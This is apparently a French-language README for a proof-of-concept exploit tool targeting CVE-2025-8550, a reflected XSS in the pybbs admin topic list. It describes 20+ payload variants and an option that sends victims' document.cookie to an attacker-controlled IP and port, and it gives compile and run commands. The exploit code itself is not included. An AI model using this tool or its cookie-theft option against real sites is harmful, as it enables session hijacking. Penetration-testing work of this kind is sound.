
Exploit automatisé de preuve de concept pour CVE-2025-8550, une XSS réfléchie dans atjiu pybbs. Comprend plus de 20 variations de payload, exfiltration de cookies, multithreading et une CLI personnalisable pour les tests de pénétration.
Ce dépôt héberge un exploit automatisé de preuve de concept (PoC) pour CVE-2025-8550, une vulnérabilité de Cross‑Site Scripting (XSS) réfléchie dans atjiu pybbs (≤ v6.0.0). Il cible le paramètre username du point de terminaison /admin/topic/list, qui manque d'une désinfection appropriée des entrées.
20+ Variations de charge utile : script, SVG, iframe, object, gestionnaires onerror et plus.
Encodage automatique des URL : assure une injection sécurisée via curl_easy_escape de libcurl.
Exfiltration de cookies (Optionnel) : injection de balise pour envoyer document.cookie à un serveur contrôlé par l'attaquant.
Multithreading : utilise pthreads pour paralléliser les tentatives et accélérer les tests.
CLI personnalisable : propulsé par , prend en charge la spécification de :
argparse-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> par votre instance d'atjiu pybbs.-k pour activer la balise de vol de cookies (nécessite -i et -p).-c si aucun cookie d'authentification n'est nécessaire.Licence MIT